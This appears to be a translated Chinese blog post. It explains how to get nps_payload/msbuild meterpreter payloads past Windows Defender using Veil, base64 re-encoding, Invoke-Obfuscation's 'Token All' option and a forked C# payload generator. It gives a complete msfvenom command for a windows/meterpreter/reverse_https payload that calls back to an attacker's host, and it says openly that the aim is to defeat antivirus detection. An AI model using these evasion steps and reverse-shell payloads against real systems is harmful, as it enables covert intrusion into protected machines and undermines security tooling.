坎宁汉姆的定律是这样的:“在互联网上获得正确答案的最好方法并不是去问一个问题,而是发布一个错误的答案”。
然而,自从我发布上篇博文《win10内存花式执行meterpreter绕过杀软》后却没有收到负面反馈,不过我自己已经发现了一些问题:
以下是我目前为止发现的:
l 绝大多数杀软使用默认配置就能检测到nps_payload,因为它在后端使用了msfvenom来生成可执行的powershell代码。
l 从webDAV上获取文件对磁盘并不是“零写入的”,在C:WindowsServiceProfilesLocalServiceAppDataLocalTempTfsStoreTfs_DAV这个目录中你可以找到一些内容。
l Msbuild也不是零写入的,执行的时候会在C:Users[USER]AppDataLocalTemp[RANDOM]写入一些内容。不过,跟webDAV不一样,执行之后它会自我清理。
好消息是我可以修复第一个问题,下面是修复的步骤:
使用Veil
假设你已经安装了Veil,并且使用nps_payload生成了msbuild_nps.xml文件。
使用下面的参数运行Veil:
执行后你会得到一个payload.bat文件。根据靶机架构不同,我们会复制相对应的命令。下面我对x64架构进行了高亮显示。
在上面的这段payload中,需要删除”位置处的转义字符 (有两处)。
这种转义在Windows命令行中是需要的,但是我们要进行的操作并不需要。
现在需要进行base64编码。一种简单的编码方式是复制到一个文件中,运行如下命令:
复制base64输出内容,替换掉msbuild_nps.xml文件中的cmd命令。确保不要覆盖了闭合引号和分号。
现在你可以再次运行nps_payload,选择option4,将你的filename.txt作为输入:自定义PS1脚本。
这就OK了,告别烦人的Windows Defender。
使用Invoke-Obfuscation
首先,在一个有powershell的系统上获取Invoke-Obfuscation.运行在你自己的系统上,而不是靶机。
Windows Defender又会跳出来拦截你的操作:
在我这个例子中,最终还是得以执行。
为了获得初始的powershell脚本,你可以像执行nps-payload脚本一样使用msfvenom:
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.137.134 LPORT=443 –arch x86 –platform win -f psh -o msf_payload.txt
我使用了python的简单http server模块,通过http方式传到主机上。这将帮助我们更好的把它插入到Invoke-Obfuscation中。
使用Invoke-Obfuscation,我们需要利用的powershell脚本如下:
选择任意方法进行混淆,这里我选择“Token All”
执行后可以得到如下内容:
这就是你的powershell脚本。当你执行invoking,选择option4自定义PS1脚本时,你可以把它作为一个新文件插入这个脚本到nps-payload中。
使用Franci Šacer的nps-payload版本
先去GitHub上下载他的版本:https://github.com/fsacer/nps_payload
选择“Generate msbuild/nps/msf CSharp payload”
按照上面的步骤执行。这种方式根本没使用powershell,所以不会像使用其他方式一样被检测到。
我感觉这是所有方法中最好的一种,所以我把它放到最后,是想延长微软开始对它进行检测的时间。
因为我一放出这种方式,微软肯定会有所行动。
审核人:yiwang 编辑:边边